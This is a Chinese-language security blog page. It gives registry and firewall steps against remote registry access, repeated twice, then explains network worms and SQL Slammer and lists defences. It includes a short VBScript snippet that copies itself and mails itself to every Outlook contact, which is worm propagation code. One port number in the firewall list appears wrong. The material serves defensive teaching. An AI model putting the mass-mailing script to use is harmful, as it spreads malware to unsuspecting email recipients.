注冊(cè)表是Windows操作系統(tǒng)的核心。但是在缺省情況下,所有基于Windows的計(jì)算機(jī)的注冊(cè)表在網(wǎng)絡(luò)上都是可以被訪問到。了解這一點(diǎn)的黑客完全可以利用這個(gè)安全漏洞來對(duì)你的公司的計(jì)算機(jī)系統(tǒng)進(jìn)行攻擊,并修改文件關(guān)系,并允許插入惡意代碼。為了保護(hù)你的網(wǎng)絡(luò),你需要禁止對(duì)注冊(cè)表的遠(yuǎn)程訪問。
解決方案
你輕而易舉地可以通過修改網(wǎng)絡(luò)訪問清單來達(dá)到這一目標(biāo)。根據(jù)你網(wǎng)絡(luò)的復(fù)雜程度,你可能需要考慮禁止對(duì)注冊(cè)表的遠(yuǎn)程訪問。
注意
編輯注冊(cè)表可能會(huì)有風(fēng)險(xiǎn),所以必須要在開始之前確保你已經(jīng)對(duì)注冊(cè)表進(jìn)行了備份。
修改注冊(cè)表
對(duì)于使用Windows 2000、Windows XP、和Windows Server 2003系統(tǒng)的計(jì)算機(jī),采取如下步驟:
1、點(diǎn)擊“開始”菜單,選擇“運(yùn)行”。
2、輸入“Regedt32.exe”,然后點(diǎn)擊“OK”。
3、選擇“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers”。
4、如果winreg鍵已經(jīng)存在,跳到步驟8。如果該鍵不存在,點(diǎn)擊“編輯”菜單,選擇“添加”。
5、把該鍵命名為“winreg”,類別設(shè)定為REG_SZ。
6、選擇這個(gè)新創(chuàng)建的鍵,然后點(diǎn)擊“編輯”菜單,選擇“增加值“。
7、進(jìn)行如下輸入:
名稱: Description
類型: REG_SZ
值 : Registry Server
8、選擇winreg鍵,進(jìn)入安全 | 許可 。
9、確保本地系統(tǒng)管理員組(System Administrators Group)擁有全部的訪問權(quán),把只讀權(quán)限開放給系統(tǒng)帳戶(System account)和所有人組(Everyone group)。
10、關(guān)閉注冊(cè)表編輯器,重新啟動(dòng)計(jì)算機(jī)。
如果你為工作站或者服務(wù)器支持設(shè)定了特殊的組,而這些組的成員又不是管理員,你就應(yīng)該也為他們?cè)O(shè)定合適的權(quán)限。
而且,如果你面對(duì)的機(jī)器是一臺(tái)服務(wù)器或者是一臺(tái)為特殊用戶提供遠(yuǎn)程服務(wù)的計(jì)算機(jī),你就必須允許有權(quán)使用服務(wù)的帳戶對(duì)相關(guān)內(nèi)容有只讀的權(quán)限。
調(diào)整網(wǎng)絡(luò)
注冊(cè)表修改能夠保護(hù)你內(nèi)部網(wǎng)絡(luò)需要經(jīng)過授權(quán)才能訪問,但是你還需要保護(hù)注冊(cè)表不受外部的來自互聯(lián)網(wǎng)的訪問。利用注冊(cè)表的安全漏洞對(duì)Windows系統(tǒng)進(jìn)行攻擊仍然非常普遍,所以你需要保證你的安全策略已經(jīng)很好地解決了這些安全漏洞。
在前端的路由器或者防火墻上禁用TCP/UDP端口135、137、138、139和455是一個(gè)不錯(cuò)的解決方法。禁用這些端口不僅僅是能夠阻止遠(yuǎn)程訪問注冊(cè)表,這樣做還能夠阻止大部分針對(duì)Windows系統(tǒng)的遠(yuǎn)程攻擊。
關(guān)閉這些端口迅速提高你的Windows網(wǎng)絡(luò)的安全性,在沒有禁用這些端口之前,你需要確認(rèn)是否有商業(yè)的原因需要保持這些端口的開放。
這些是你所能夠關(guān)閉的、運(yùn)行Windows 2000、Windows XP和Windows Server 2003系統(tǒng)上的遠(yuǎn)程注冊(cè)表服務(wù)(Remote Registry),這對(duì)于企業(yè)來說,永遠(yuǎn)是一個(gè)非常有幫助的、實(shí)用的方法。
問題
注冊(cè)表是Windows操作系統(tǒng)的核心。但是在缺省情況下,所有基于Windows的計(jì)算機(jī)的注冊(cè)表在網(wǎng)絡(luò)上都是可以被訪問到。了解這一點(diǎn)的黑客完全可以利用這個(gè)安全漏洞來對(duì)你的公司的計(jì)算機(jī)系統(tǒng)進(jìn)行攻擊,并修改文件關(guān)系,并允許插入惡意代碼。為了保護(hù)你的網(wǎng)絡(luò),你需要禁止對(duì)注冊(cè)表的遠(yuǎn)程訪問。
解決方案
你輕而易舉地可以通過修改網(wǎng)絡(luò)訪問清單來達(dá)到這一目標(biāo)。根據(jù)你網(wǎng)絡(luò)的復(fù)雜程度,你可能需要考慮禁止對(duì)注冊(cè)表的遠(yuǎn)程訪問。
注意
編輯注冊(cè)表可能會(huì)有風(fēng)險(xiǎn),所以必須要在開始之前確保你已經(jīng)對(duì)注冊(cè)表進(jìn)行了備份。
修改注冊(cè)表
對(duì)于使用Windows 2000、Windows XP、和Windows Server 2003系統(tǒng)的計(jì)算機(jī),采取如下步驟:
1、點(diǎn)擊“開始”菜單,選擇“運(yùn)行”。
2、輸入“Regedt32.exe”,然后點(diǎn)擊“OK”。
3、選擇“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers”。
4、如果winreg鍵已經(jīng)存在,跳到步驟8。如果該鍵不存在,點(diǎn)擊“編輯”菜單,選擇“添加”。
5、把該鍵命名為“winreg”,類別設(shè)定為REG_SZ。
6、選擇這個(gè)新創(chuàng)建的鍵,然后點(diǎn)擊“編輯”菜單,選擇“增加值“。
7、進(jìn)行如下輸入:
名稱: Description
類型: REG_SZ
值 : Registry Server
8、選擇winreg鍵,進(jìn)入安全 | 許可 。
9、確保本地系統(tǒng)管理員組(System Administrators Group)擁有全部的訪問權(quán),把只讀權(quán)限開放給系統(tǒng)帳戶(System account)和所有人組(Everyone group)。
10、關(guān)閉注冊(cè)表編輯器,重新啟動(dòng)計(jì)算機(jī)。
如果你為工作站或者服務(wù)器支持設(shè)定了特殊的組,而這些組的成員又不是管理員,你就應(yīng)該也為他們?cè)O(shè)定合適的權(quán)限。
而且,如果你面對(duì)的機(jī)器是一臺(tái)服務(wù)器或者是一臺(tái)為特殊用戶提供遠(yuǎn)程服務(wù)的計(jì)算機(jī),你就必須允許有權(quán)使用服務(wù)的帳戶對(duì)相關(guān)內(nèi)容有只讀的權(quán)限。
調(diào)整網(wǎng)絡(luò)
注冊(cè)表修改能夠保護(hù)你內(nèi)部網(wǎng)絡(luò)需要經(jīng)過授權(quán)才能訪問,但是你還需要保護(hù)注冊(cè)表不受外部的來自互聯(lián)網(wǎng)的訪問。利用注冊(cè)表的安全漏洞對(duì)Windows系統(tǒng)進(jìn)行攻擊仍然非常普遍,所以你需要保證你的安全策略已經(jīng)很好地解決了這些安全漏洞。
在前端的路由器或者防火墻上禁用TCP/UDP端口135、137、138、139和455是一個(gè)不錯(cuò)的解決方法。禁用這些端口不僅僅是能夠阻止遠(yuǎn)程訪問注冊(cè)表,這樣做還能夠阻止大部分針對(duì)Windows系統(tǒng)的遠(yuǎn)程攻擊。
關(guān)閉這些端口迅速提高你的Windows網(wǎng)絡(luò)的安全性,在沒有禁用這些端口之前,你需要確認(rèn)是否有商業(yè)的原因需要保持這些端口的開放。
這些是你所能夠關(guān)閉的、運(yùn)行Windows 2000、Windows XP和Windows Server 2003系統(tǒng)上的遠(yuǎn)程注冊(cè)表服務(wù)(Remote Registry),這對(duì)于企業(yè)來說,永遠(yuǎn)是一個(gè)非常有幫助的、實(shí)用的方法。
解析并防范電腦蠕蟲病毒
[ 2007-03-25 03:58:26 | 作者: sun ]
凡能夠引起計(jì)算機(jī)故障,破壞計(jì)算機(jī)數(shù)據(jù)的程序統(tǒng)稱為計(jì)算機(jī)病毒。所以從這個(gè)意義上說,蠕蟲也是一種病毒!網(wǎng)絡(luò)蠕蟲病毒,作為對(duì)互聯(lián)網(wǎng)危害嚴(yán)重的 一種計(jì)算機(jī)程序,其破壞力和傳染性不容忽視。與傳統(tǒng)的病毒不同,蠕蟲病毒以計(jì)算機(jī)為載體,以網(wǎng)絡(luò)為攻擊對(duì)象!本文中將蠕蟲病毒分為針對(duì)企業(yè)網(wǎng)絡(luò)和個(gè)人用戶2類,并從企業(yè)用戶和個(gè)人用戶兩個(gè)方面探討蠕蟲病毒的特征和一些防范措施!
本文根據(jù)蠕蟲病毒的發(fā)作機(jī)制,將其分為利用系統(tǒng)級(jí)別漏洞(主動(dòng)傳播)和利用社會(huì)工程學(xué)(欺騙傳播)兩種,并從用戶角度中將蠕蟲病毒分為針對(duì)企業(yè)網(wǎng)絡(luò)和個(gè)人用戶2類,從企業(yè)用戶和個(gè)人用戶兩個(gè)方面探討蠕蟲病毒的特征和一些防范措施!
一、蠕蟲病毒的定義
1.蠕蟲病毒的定義
計(jì)算機(jī)病毒自出現(xiàn)之日起,就成為計(jì)算機(jī)的一個(gè)巨大威脅,而當(dāng)網(wǎng)絡(luò)迅速發(fā)展的時(shí)候,蠕蟲病毒引起的危害開始顯現(xiàn)!從廣義上定義,凡能夠引起計(jì)算機(jī)故障,破壞計(jì)算機(jī)數(shù)據(jù)的程序統(tǒng)稱為計(jì)算機(jī)病毒。所以從這個(gè)意義上說,蠕蟲也是一種病毒!但是蠕蟲病毒和一般的病毒有著很大的區(qū)別。對(duì)于蠕蟲,現(xiàn)在還沒有一個(gè)成套的理論體系,一般認(rèn)為,蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時(shí)具有自己的一些特征,如不利用文件寄生(有的只存在于內(nèi)存中),對(duì)網(wǎng)絡(luò)造成拒絕服務(wù),以及和黑客技術(shù)相結(jié)合等等!在產(chǎn)生的破壞性上,蠕蟲病毒也不是普通病毒所能比擬的,網(wǎng)絡(luò)的發(fā)展使得蠕蟲可以在短短的時(shí)間內(nèi)蔓延整個(gè)網(wǎng)絡(luò),造成網(wǎng)絡(luò)癱瘓!
根據(jù)使用者情況可將蠕蟲病毒分為2類,一種是面向企業(yè)用戶和局域網(wǎng)而言,這種病毒利用系統(tǒng)漏洞,主動(dòng)進(jìn)行攻擊,可以對(duì)整個(gè)互聯(lián)網(wǎng)可造成癱瘓性的后果!以“紅色代碼”,“尼姆達(dá)”,以及最新的“sql蠕蟲王”為代表。另外一種是針對(duì)個(gè)人用戶的,通過網(wǎng)絡(luò)(主要是電子郵件,惡意網(wǎng)頁形式)迅速傳播的蠕蟲病毒,以愛蟲病毒,求職信病毒為例.在這兩類中,第一類具有很大的主動(dòng)攻擊性,而且爆發(fā)也有一定的突然性,但相對(duì)來說,查殺這種病毒并不是很難。第二種病毒的傳播方式比較復(fù)雜和多樣,少數(shù)利用了微軟的應(yīng)用程序的漏洞,更多的是利用社會(huì)工程學(xué)()對(duì)用戶進(jìn)行欺騙和誘使,這樣的病毒造成的損失是非常大的,同時(shí)也是很難根除的,比如求職信病毒,在2001年就已經(jīng)被各大殺毒廠商發(fā)現(xiàn),但直到2002年底依然排在病毒危害排行榜的首位就是證明!出得在接下來的內(nèi)容中,將分別分析這兩種病毒的一些特征及防范措施!
2.蠕蟲病毒與一般病毒的異同
蠕蟲也是一種病毒,因此具有病毒的共同特征。一般的病毒是需要的寄生的,它可以通過自己指令的執(zhí)行,將自己的指令代碼寫到其他程序的體內(nèi),而被感染的文件就被稱為”宿主”,例如,windows下可執(zhí)行文件的格式為pe格式(Portable Executable),當(dāng)需要感染pe文件時(shí),在宿主程序中,建立一個(gè)新節(jié),將病毒代碼寫到新節(jié)中,修改的程序入口點(diǎn)等,這樣,宿主程序執(zhí)行的時(shí)候,就可以先執(zhí)行病毒程序,病毒程序運(yùn)行完之后,在把控制權(quán)交給宿主原來的程序指令。可見,病毒主要是感染文件,當(dāng)然也還有像DIRII這種鏈接型病毒,還有引導(dǎo)區(qū)病毒。引導(dǎo)區(qū)病毒他是感染磁盤的引導(dǎo)區(qū),如果是軟盤被感染,這張軟盤用在其他機(jī)器上后,同樣也會(huì)感染其他機(jī)器,所以傳播方式也是用軟盤等方式。
蠕蟲一般不采取利用pe格式插入文件的方法,而是復(fù)制自身在互聯(lián)網(wǎng)環(huán)境下進(jìn)行傳播,病毒的傳染能力主要是針對(duì)計(jì)算機(jī)內(nèi)的文件系統(tǒng)而言,而蠕蟲病毒的傳染目標(biāo)是互聯(lián)網(wǎng)內(nèi)的所有計(jì)算機(jī).局域網(wǎng)條件下的共享文件夾,電子郵件email,網(wǎng)絡(luò)中的惡意網(wǎng)頁,大量存在著漏洞的服務(wù)器等都成為蠕蟲傳播的良好途徑。網(wǎng)絡(luò)的發(fā)展也使得蠕蟲病毒可以在幾個(gè)小時(shí)內(nèi)蔓延全球!而且蠕蟲的主動(dòng)攻擊性和突然爆發(fā)性將使得人們手足無策!
普通病毒 蠕蟲病毒
存在形式 寄存文件 獨(dú)立程序
傳染機(jī)制 宿主程序運(yùn)行 主動(dòng)攻擊
傳染目標(biāo) 本地文件 網(wǎng)絡(luò)計(jì)算機(jī)
可以預(yù)見,未來能夠給網(wǎng)絡(luò)帶來重大災(zāi)難的主要必定是網(wǎng)絡(luò)蠕蟲!
3.蠕蟲的破壞和發(fā)展趨勢
1988年一個(gè)由美國CORNELL大學(xué)研究生莫里斯編寫的蠕蟲病毒蔓延造成了數(shù)千臺(tái)計(jì)算機(jī)停機(jī),蠕蟲病毒開始現(xiàn)身網(wǎng)絡(luò);而后來的紅色代碼,尼姆達(dá)病毒瘋狂的時(shí)候,造成幾十億美元的損失;北京時(shí)間2003年1月26日, 一種名為“2003蠕蟲王”的電腦病毒迅速傳播并襲擊了全球,致使互聯(lián)網(wǎng)網(wǎng)路嚴(yán)重堵塞,作為互聯(lián)網(wǎng)主要基礎(chǔ)的域名服務(wù)器(DNS)的癱瘓?jiān)斐删W(wǎng)民瀏覽互聯(lián)網(wǎng)網(wǎng)頁及收發(fā)電子郵件的速度大幅減緩,同時(shí)銀行自動(dòng)提款機(jī)的運(yùn)作中斷, 機(jī)票等網(wǎng)絡(luò)預(yù)訂系統(tǒng)的運(yùn)作中斷,信用卡等收付款系統(tǒng)出現(xiàn)故障!專家估計(jì),此病毒造成的直接經(jīng)濟(jì)損失至少在12億美元以上!
病毒名稱 持續(xù)時(shí)間 造成損失莫里斯蠕蟲 1988年
6000多臺(tái)計(jì)算機(jī)停機(jī),直接經(jīng)濟(jì)損失達(dá)9600萬美元! 美麗殺手
1999年 政府部門和一些大公司緊急關(guān)閉了網(wǎng)絡(luò)服務(wù)器,
經(jīng)濟(jì)損失超過12億美元!愛蟲病毒
2000年5月至今
眾多用戶電腦被感染,損失超過100億美元以上 紅色代碼
2001年7月 網(wǎng)絡(luò)癱瘓,直接經(jīng)濟(jì)損失超過26億美元 求職信
2001年12月至今 大量病毒郵件堵塞服務(wù)器,損失達(dá)數(shù)百億美元 蠕蟲王
2003年1月 網(wǎng)絡(luò)大面積癱瘓,銀行自動(dòng)提款機(jī)運(yùn)做中斷,直接經(jīng)濟(jì)損失超過26億美元
由表可以知道,蠕蟲病毒對(duì)網(wǎng)絡(luò)產(chǎn)生堵塞作用,并造成了巨大的經(jīng)濟(jì)損失!
通過對(duì)以上蠕蟲病毒的分析,可以知道,蠕蟲發(fā)作的一些特點(diǎn)和發(fā)展趨勢:
1.利用操作系統(tǒng)和應(yīng)用程序的漏洞主動(dòng)進(jìn)行攻擊.. 此類病毒主要是“紅色代碼”和“尼姆達(dá)”,以及至今依然肆虐的”求職信”等.由于IE瀏覽器的漏洞(Iframe Execcomand),使得感染了“尼姆達(dá)”病毒的郵件在不去手工打開附件的情況下病毒就能激活,而此前即便是很多防病毒專家也一直認(rèn)為,帶有病毒附件的郵件,只要不去打開附件,病毒不會(huì)有危害。“紅色代碼”是利用了微軟IIS服務(wù)器軟件的漏洞(idq.dll遠(yuǎn)程緩存區(qū)溢出)來傳播。Sql蠕蟲王病毒則是利用了微軟的數(shù)據(jù)庫系統(tǒng)的一個(gè)漏洞進(jìn)行大肆攻擊!
2.傳播方式多樣 如“尼姆達(dá)”病毒和”求職信”病毒,可利用的傳播途徑包括文件、電子郵件、Web服務(wù)器、網(wǎng)絡(luò)共享等等。
3.病毒制作技術(shù)與傳統(tǒng)的病毒不同的是,許多新病毒是利用當(dāng)前最新的編程語言與編程技術(shù)實(shí)現(xiàn)的,易于修改以產(chǎn)生新的變種,從而逃避反病毒軟件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技術(shù),可以潛伏在HTML頁面里,在上網(wǎng)瀏覽時(shí)觸發(fā)。
4.與黑客技術(shù)相結(jié)合! 潛在的威脅和損失更大!以紅色代碼為例,感染后的機(jī)器的web目錄的\scripts下將生成一個(gè)root.exe,可以遠(yuǎn)程執(zhí)行任何命令,從而使黑客能夠再次進(jìn)入!二、網(wǎng)絡(luò)蠕蟲病毒分析和防范
蠕蟲和普通病毒不同的一個(gè)特征是蠕蟲病毒往往能夠利用漏洞,這里的漏洞或者說是缺陷,我們分為2種,軟件上的缺陷和人為上的缺陷。軟件上的缺陷,如遠(yuǎn)程溢出,微軟ie和outlook的自動(dòng)執(zhí)行漏洞等等,需要軟件廠商和用戶共同配合,不斷的升級(jí)軟件。而人為的缺陷,主要是指的是計(jì)算機(jī)用戶的疏忽。這就是所謂的社會(huì)工程學(xué)(social engineering),當(dāng)收到一封郵件帶著病毒的求職信郵件時(shí)候,大多數(shù)人都會(huì)報(bào)著好奇去點(diǎn)擊的。對(duì)于企業(yè)用戶來說,威脅主要集中在服務(wù)器和大型應(yīng)用軟件的安全上,而個(gè)人用戶而言,主要是防范第二種缺陷。
1.利用系統(tǒng)漏洞的惡性蠕蟲病毒分析
在這種病毒中,以紅色代碼,尼姆達(dá)和sql蠕蟲為代表!他們共同的特征是利用微軟服務(wù)器和應(yīng)用程序組件的某個(gè)漏洞進(jìn)行攻擊,由于網(wǎng)上存在這樣的漏洞比較普遍,使得病毒很容易的傳播!而且攻擊的對(duì)象大都為服務(wù)器,所以造成的網(wǎng)絡(luò)堵塞現(xiàn)象嚴(yán)重!
以2003年1月26號(hào)爆發(fā)的sql蠕蟲為例,爆發(fā)數(shù)小時(shí)內(nèi)席卷了全球網(wǎng)絡(luò),造成網(wǎng)絡(luò)大塞車.亞洲國家中以人口上網(wǎng)普及率達(dá)七成的韓國所受影響較為嚴(yán)重。韓國兩大網(wǎng)絡(luò)業(yè)KFT及***電訊公司,系統(tǒng)都陷入了癱瘓,其它的網(wǎng)絡(luò)用戶也被迫斷線,更為嚴(yán)重的是許多銀行的自動(dòng)取款機(jī)都無法正常工作, 美國許美國銀行統(tǒng)計(jì),該行的13000臺(tái)自動(dòng)柜員機(jī)已經(jīng)無法提供正常提款。網(wǎng)絡(luò)蠕蟲病毒開始對(duì)人們的生活產(chǎn)生了巨大的影響!
這次sql蠕蟲攻擊的是微軟數(shù)據(jù)庫系Microsoft SQL Server 2000的,利用了MSSQL2000服務(wù)遠(yuǎn)程堆棧緩沖區(qū)溢出漏洞, Microsoft SQL Server 2000是一款由Microsoft公司開發(fā)的商業(yè)性質(zhì)大型數(shù)據(jù)庫系統(tǒng)。SQL Server監(jiān)聽UDP的1434端口,客戶端可以通過發(fā)送消息到這個(gè)端口來查詢目前可用的連接方式(連接方式可以是命名管道也可以是TCP),但是此程序存在嚴(yán)重漏洞,當(dāng)客戶端發(fā)送超長數(shù)據(jù)包時(shí),將導(dǎo)致緩沖區(qū)溢出,黑客可以利用該漏洞在遠(yuǎn)程機(jī)器上執(zhí)行自己的惡意代碼。
微軟在200年7月份的時(shí)候就為這個(gè)漏洞發(fā)布了一個(gè)安全公告,但當(dāng)sql蠕蟲爆發(fā)的時(shí)候,依然有大量的裝有ms sqlserver 2000的服務(wù)器沒有安裝最新的補(bǔ)丁,從而被蠕蟲病毒所利用,蠕蟲病毒通過一段376個(gè)字節(jié)的惡意代碼,遠(yuǎn)程獲得對(duì)方主機(jī)的系統(tǒng)控制權(quán)限, 取得三個(gè)Win32 API地址,GetTickCount、socket、sendto,接著病毒使用GetTickCount獲得一個(gè)隨機(jī)數(shù),進(jìn)入一個(gè)死循環(huán)繼續(xù)傳播。在該循環(huán)中蠕蟲使用獲得的隨機(jī)數(shù)生成一個(gè)隨機(jī)的ip地址,然后將自身代碼發(fā)送至1434端口(Microsoft SQL Server開放端口),該蠕蟲傳播速度極快,其使用廣播數(shù)據(jù)包方式發(fā)送自身代碼,每次均攻擊子網(wǎng)中所有255臺(tái)可能存在機(jī)器。由于這是一個(gè)死循環(huán)的過程,發(fā)包密度僅和機(jī)器性能和網(wǎng)絡(luò)帶寬有關(guān),所以發(fā)送的數(shù)據(jù)量非常大。該蠕蟲對(duì)被感染機(jī)器本身并沒有進(jìn)行任何惡意破壞行為,也沒有向硬盤上寫文件,僅僅存在與內(nèi)存中。對(duì)于感染的系統(tǒng),重新啟動(dòng)后就可以清除蠕蟲,但是仍然會(huì)重復(fù)感染。由于發(fā)送數(shù)據(jù)包占用了大量系統(tǒng)資源和網(wǎng)絡(luò)帶寬,形成Udp Flood,感染了該蠕蟲的網(wǎng)絡(luò)性能會(huì)極度下降。一個(gè)百兆網(wǎng)絡(luò)內(nèi)只要有一兩臺(tái)機(jī)器感染該蠕蟲就會(huì)導(dǎo)致整個(gè)網(wǎng)絡(luò)訪問阻塞。
通過以上分析可以知道,此蠕蟲病毒本身除了對(duì)網(wǎng)絡(luò)產(chǎn)生拒絕服務(wù)攻擊外,并沒有別的破壞措施.但如果病毒編寫者在編寫病毒的時(shí)候加入破壞代碼,后果將不堪設(shè)想!
2.企業(yè)防范蠕蟲病毒措施
此次sql蠕蟲病毒,利用的漏洞在2002年7月份微軟的一份安全公告中就有詳細(xì)說明!而且微軟也提供了安全補(bǔ)丁提供下載,然而在時(shí)隔半年之后互聯(lián)網(wǎng)上還有相當(dāng)大的一部分服務(wù)器沒有安裝最新的補(bǔ)丁,其網(wǎng)絡(luò)管理員的安全防范意識(shí)可見一斑!
當(dāng)前,企業(yè)網(wǎng)絡(luò)主要應(yīng)用于文件和打印服務(wù)共享、辦公自動(dòng)化系統(tǒng)、企業(yè)業(yè)務(wù)(MIS)系統(tǒng)、Internet應(yīng)用等領(lǐng)域。網(wǎng)絡(luò)具有便利信息交換特性,蠕蟲病毒也可以充分利用網(wǎng)絡(luò)快速傳播達(dá)到其阻塞網(wǎng)絡(luò)目的。企業(yè)在充分地利用網(wǎng)絡(luò)進(jìn)行業(yè)務(wù)處理時(shí),就不得不考慮企業(yè)的病毒防范問題,以保證關(guān)系企業(yè)命運(yùn)的業(yè)務(wù)數(shù)據(jù)完整不被破壞。
企業(yè)防治蠕蟲病毒的時(shí)候需要考慮幾個(gè)問題:病毒的查殺能力,病毒的監(jiān)控能力,新病毒的反應(yīng)能力。而企業(yè)防毒的一個(gè)重要方面是是管理和策略。推薦的企業(yè)防范蠕蟲病毒的策略如下:
(1)加強(qiáng)網(wǎng)絡(luò)管理員安全管理水平,提高安全意識(shí)。由于蠕蟲病毒利用的是系統(tǒng)漏洞進(jìn)行攻擊,所以需要在第一時(shí)間內(nèi)保持系統(tǒng)和應(yīng)用軟件的安全性,保持各種操作系統(tǒng)和應(yīng)用軟件的更新!由于各種漏洞的出現(xiàn),使得安全不在是一種一勞永逸的事,而作為企業(yè)用戶而言,所經(jīng)受攻擊的危險(xiǎn)也是越來越大,要求企業(yè)的管理水平和安全意識(shí)也越來越高!
(2)建立病毒檢測系統(tǒng)。能夠在第一時(shí)間內(nèi)檢測到網(wǎng)絡(luò)異常和病毒攻擊。
(3)建立應(yīng)急響應(yīng)系統(tǒng),將風(fēng)險(xiǎn)減少到最小!由于蠕蟲病毒爆發(fā)的突然性,可能在病毒發(fā)現(xiàn)的時(shí)候已經(jīng)蔓延到了整個(gè)網(wǎng)絡(luò),所以在突發(fā)情況下,建立一個(gè)緊急響應(yīng)系統(tǒng)是很有必要的,在病毒爆發(fā)的第一時(shí)間即能提供解決方案。
(4)建立災(zāi)難備份系統(tǒng)。對(duì)于數(shù)據(jù)庫和數(shù)據(jù)系統(tǒng),必須采用定期備份,多機(jī)備份措施,防止意外災(zāi)難下的數(shù)據(jù)丟失!
(5)對(duì)于局域網(wǎng)而言,可以采用以下一些主要手段:A.在因特網(wǎng)接入口處安裝防火墻式防殺計(jì)算機(jī)病毒產(chǎn)品,將病毒隔離在局域網(wǎng)之外。B.對(duì)郵件服務(wù)器進(jìn)行監(jiān)控,防止帶毒郵件進(jìn)行傳播!C.對(duì)局域網(wǎng)用戶進(jìn)行安全培訓(xùn)。D.建立局域網(wǎng)內(nèi)部的升級(jí)系統(tǒng),包括各種操作系統(tǒng)的補(bǔ)丁升級(jí),各種常用的應(yīng)用軟件升級(jí),各種殺毒軟件病毒庫的升級(jí)等等!3.對(duì)個(gè)人用戶產(chǎn)生直接威脅的蠕蟲病毒
在以上分析的蠕蟲病毒中,只對(duì)安裝了特定的微軟組件的系統(tǒng)進(jìn)行攻擊,而對(duì)廣大個(gè)人用戶而言,是不會(huì)安裝iis(微軟的因特網(wǎng)服務(wù)器程序,可以使允許在網(wǎng)上提供web服務(wù))或者是龐大的數(shù)據(jù)庫系統(tǒng)的!因此上述病毒并不會(huì)直接攻擊個(gè)個(gè)人用戶的電腦(當(dāng)然能夠間接的通過網(wǎng)絡(luò)產(chǎn)生影響),但接下來分析的蠕蟲病毒,則是對(duì)個(gè)人用戶威脅最大,同時(shí)也是最難以根除,造成的損失也更大的一類蠕蟲病毒!
對(duì)于個(gè)人用戶而言,威脅大的蠕蟲病毒采取的傳播方式一般為電子郵件(Email)以及惡意網(wǎng)頁等等!
對(duì)于利用email傳播得蠕蟲病毒來說,通常利用的是社會(huì)工程學(xué)(Social Engineering),即以各種各樣的欺騙手段那誘惑用戶點(diǎn)擊的方式進(jìn)行傳播!
惡意網(wǎng)頁確切的講是一段黑客破壞代碼程序,它內(nèi)嵌在網(wǎng)頁中,當(dāng)用戶在不知情的情況下打開含有病毒的網(wǎng)頁時(shí),病毒就會(huì)發(fā)作。這種病毒代碼鑲嵌技術(shù)的原理并不復(fù)雜,所以會(huì)被很多懷不良企圖者利用,在很多黑客網(wǎng)站竟然出現(xiàn)了關(guān)于用網(wǎng)頁進(jìn)行破壞的技術(shù)的論壇,并提供破壞程序代碼下載,從而造成了惡意網(wǎng)頁的大面積泛濫,也使越來越多的用戶遭受損失。
對(duì)于惡意網(wǎng)頁,常常采取vb script和java script編程的形式!由于編程方式十分的簡單!所以在網(wǎng)上非常的流行!
Vb script和java script是由微軟操作系統(tǒng)的wsh(Windows Scripting HostWindows腳本主機(jī))解析并執(zhí)行的,由于其編程非常簡單,所以此類腳本病毒在網(wǎng)上瘋狂傳播,瘋狂一時(shí)的愛蟲病毒就是一種vbs腳本病毒,然后偽裝成郵件附件誘惑用戶點(diǎn)擊運(yùn)行,更為可怕的是,這樣的病毒是以源代碼的形式出現(xiàn)的,只要懂得一點(diǎn)關(guān)于腳本編程的人就可以修改其代碼,形成各種各樣的變種。
下面以一個(gè)簡單的腳本為例:
Set objFs=CreateObject (“Scripting.FileSystemObject”)
(創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象)objFs.CreateTextFile ("C:\virus.txt", 1)
(通過文件系統(tǒng)對(duì)象的方法創(chuàng)建了TXT文件)
如果我們把這兩句話保存成為.vbs的VB腳本文件,點(diǎn)擊就會(huì)在C盤中創(chuàng)建一個(gè)TXT文件了。倘若我們把第二句改為:
objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")
就可以將自身復(fù)制到C盤virus.vbs這個(gè)文件。本句前面是打開這個(gè)腳本文件,WScript.ScriptFullName指明是這個(gè)程序本身,是一個(gè)完整的路徑文件名。GetFile函數(shù)獲得這個(gè)文件,Copy函數(shù)將這個(gè)文件復(fù)制到C盤根目錄下virus.vbs這個(gè)文件。這么簡單的兩句就實(shí)現(xiàn)了自我復(fù)制的功能,已經(jīng)具備病毒的基本特征——自我復(fù)制能力。
此類病毒往往是通過郵件傳播的,在vb script中調(diào)用郵件發(fā)送功能也非常的簡單,病毒往往采用的方法是向outlook中的地址薄中的郵件地址發(fā)送帶有包含自身的郵件來達(dá)到傳播目的,一個(gè)簡單的實(shí)例如下:
Set objOA=Wscript.CreateObject ("Outlook.Application")
(創(chuàng)建一個(gè)OUTLOOK應(yīng)用的對(duì)象)Set objMapi=objOA.GetNameSpace ("MAPI")
(取得MAPI名字空間)For i=1 to objMapi.AddressLists.Count(遍歷地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count Set
objMail=objOA.CreateItem (0) objMail.Recipients.Add
(objAddList. AddressEntries
(j))
(取得收件人郵件地址 )objMail.Subject="你好!"
(設(shè)置郵件主題,這個(gè)往往具有很大的誘惑性質(zhì))
objMail.Body="這次給你的附件,是我的新文檔!"
(設(shè)置信件內(nèi)容)objMail.Attachments.Add (“c:\virus.vbs")
(把自己作為附件擴(kuò)散出去 )objMail.Send(發(fā)送郵件)
NextNext Set objMapi=Nothing(清空objMapi變量,釋放資源)
set objOA=Nothing(清空objOA變量)
這一小段代碼的功能是向地址簿中的用戶發(fā)送電子郵件,并將自己作為附件擴(kuò)散出去。這段代碼中的第一行是創(chuàng)建一個(gè)Outlook的對(duì)象,是必不可少的。在其下是一個(gè)循環(huán),在循環(huán)中不斷地向地址簿中的電子郵件地址發(fā)送內(nèi)容相同的信件。這就是蠕蟲的傳播性。
由此可以看出,利用vb script編寫病毒是非常容易的,這就使得此類病毒的變種繁多,破壞力極大,同時(shí)也是非常難以根除的!
4.個(gè)人用戶對(duì)蠕蟲病毒的防范措施
通過上述的分析,我們可以知道,病毒并不是非常可怕的,網(wǎng)絡(luò)蠕蟲病毒對(duì)個(gè)人用戶的攻擊主要還是通過社會(huì)工程學(xué),而不是利用系統(tǒng)漏洞!所以防范此類病毒需要注意以下幾點(diǎn):
